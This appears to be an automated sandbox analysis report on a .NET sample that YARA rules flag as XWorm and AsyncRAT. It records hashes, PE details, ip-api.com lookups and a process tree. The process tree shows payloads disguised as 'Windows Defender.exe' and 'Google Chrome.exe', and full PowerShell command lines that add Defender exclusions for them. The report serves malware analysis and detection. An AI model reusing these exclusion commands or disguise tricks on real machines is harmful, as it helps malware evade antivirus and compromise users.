                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu1fhkgy.hxm.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycnt2h5n.4v3.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  Static File Info

                                                  General

                                                  File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.138378464049447
                                                  TrID:
                                                  • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                  • Win64 Executable GUI (202006/5) 46.43%
                                                  • Win64 Executable (generic) (12005/4) 2.76%
                                                  • Generic Win/DOS Executable (2004/3) 0.46%
                                                  • DOS Executable Generic (2002/1) 0.46%
                                                  File name:X.exe
                                                  File size:10'559'488 bytes
                                                  MD5:edf2d391a87307c0d10482da0aa93e6f
                                                  SHA1:017acb50488e7a3e17c9e90eed8dec6c100a9792
                                                  SHA256:c492044065d21e049097e0cde12f57be6eca492a097d790a9b192a62d70fd07d
                                                  SHA512:b523085f35ccdf506fced0bdb7c60d8ea2b04d505c3311a8403db7de6fc6989c12915320385069a65fee706bb36557125506f5cc0f129b96f6dc3260cc2fa9db
                                                  SSDEEP:24576:ciZe9R2HNNQeAKDwfSKwhrUBv2n7L8bo8sv03D/25ZuJH8Q4BeAd8N5r0IFqENkW:tZe9gHbSJqAO7m9KQOCCx6aI5A/J
                                                  TLSH:D1B67155A261B214FB4CB330194CFE3A57B0A97516B88EC39EE7F5712CA1C396E09336
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."...................... .....@..... .......................`............@...@......@............... .....

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x140000000
                                                  Entrypoint Section:
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66FD2EB6 [Wed Oct 2 11:29:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:

                                                  Entrypoint Preview

                                                  Instruction
                                                  dec ebp
                                                  pop edx
                                                  nop
                                                  add byte ptr [ebx], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa140000x4b6.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xa117140xa118005fa565b41ea169c2d64c217dcaaf5b70unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa140000x4b60x6001fb236da24f690addedcf16f0e5701b8False0.3717447916666667data3.6927603228216808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0xa140a00x22cdata0.4784172661870504
                                                  RT_MANIFEST0xa142cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 8, 2024 14:02:34.331815958 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:34.336925030 CEST8049805208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:34.337344885 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:34.337344885 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:34.342430115 CEST8049805208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:34.825663090 CEST8049805208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:34.880623102 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:59.284681082 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:59.289844990 CEST8049949208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:59.290594101 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:59.290990114 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:02:59.295865059 CEST8049949208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:59.757348061 CEST8049949208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:02:59.880580902 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:03:34.697673082 CEST8049949208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:03:34.697741032 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:03:54.458683014 CEST8049805208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:03:54.460556030 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:14.838095903 CEST4980580192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:14.842937946 CEST8049805208.95.112.1192.168.2.7
                                                  Oct 8, 2024 14:04:39.781111956 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:40.083767891 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:40.693113089 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:41.896317959 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:44.302506924 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:49.115084887 CEST4994980192.168.2.7208.95.112.1
                                                  Oct 8, 2024 14:04:58.724345922 CEST4994980192.168.2.7208.95.112.1

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 8, 2024 14:02:14.549685001 CEST5625453192.168.2.71.1.1.1
                                                  Oct 8, 2024 14:02:34.315483093 CEST5992453192.168.2.71.1.1.1
                                                  Oct 8, 2024 14:02:34.324618101 CEST53599241.1.1.1192.168.2.7
                                                  Oct 8, 2024 14:02:59.260970116 CEST5174753192.168.2.71.1.1.1
                                                  Oct 8, 2024 14:02:59.269258022 CEST53517471.1.1.1192.168.2.7

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 8, 2024 14:02:14.549685001 CEST192.168.2.71.1.1.10xd9b6Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                  Oct 8, 2024 14:02:34.315483093 CEST192.168.2.71.1.1.10xe86cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  Oct 8, 2024 14:02:59.260970116 CEST192.168.2.71.1.1.10x4fbdStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 8, 2024 14:02:14.559727907 CEST1.1.1.1192.168.2.70xd9b6No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 8, 2024 14:02:15.635993004 CEST1.1.1.1192.168.2.70xd18dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 8, 2024 14:02:15.635993004 CEST1.1.1.1192.168.2.70xd18dNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 8, 2024 14:02:15.635993004 CEST1.1.1.1192.168.2.70xd18dNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 14:02:34.324618101 CEST1.1.1.1192.168.2.70xe86cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 14:02:59.269258022 CEST1.1.1.1192.168.2.70x4fbdNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • ip-api.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749805208.95.112.1802548C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 8, 2024 14:02:34.337344885 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 8, 2024 14:02:34.825663090 CEST175INHTTP/1.1 200 OK
                                                  Date: Tue, 08 Oct 2024 12:02:33 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 6
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 42
                                                  X-Rl: 43
                                                  Data Raw: 66 61 6c 73 65 0a
                                                  Data Ascii: false


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.749949208.95.112.1806568C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 8, 2024 14:02:59.290990114 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 8, 2024 14:02:59.757348061 CEST175INHTTP/1.1 200 OK
                                                  Date: Tue, 08 Oct 2024 12:02:58 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 6
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 17
                                                  X-Rl: 42
                                                  Data Raw: 66 61 6c 73 65 0a
                                                  Data Ascii: false


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:02:17
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\Desktop\X.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\X.exe"
                                                  Imagebase:0x120000
                                                  File size:10'559'488 bytes
                                                  MD5 hash:EDF2D391A87307C0D10482DA0AA93E6F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:08:02:20
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:08:02:20
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0x170000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 82%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:08:02:31
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:08:02:35
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:08:02:35
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:08:02:41
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0x7d0000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:08:02:50
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Windows Defender.exe"
                                                  Imagebase:0xea0000
                                                  File size:87'552 bytes
                                                  MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:08:02:55
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x7ff6fee10000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:14
                                                  Start time:08:02:56
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
                                                  Imagebase:0x7ff743ec0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:15
                                                  Start time:08:02:56
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:16
                                                  Start time:08:02:57
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff795bb0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:08:03:00
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:08:03:00
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:08:03:08
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x470000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:08:03:16
                                                  Start date:08/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Google Chrome.exe"
                                                  Imagebase:0x940000
                                                  File size:178'176 bytes
                                                  MD5 hash:D30B86E01EF85AA5FCF4292CB295F00F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:08:03:50
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:08:03:50
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:28
                                                  Start time:08:04:03
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:08:04:03
                                                  Start date:08/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFAAB780A31 Relevance: 3.0, Strings: 2, Instructions: 519COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
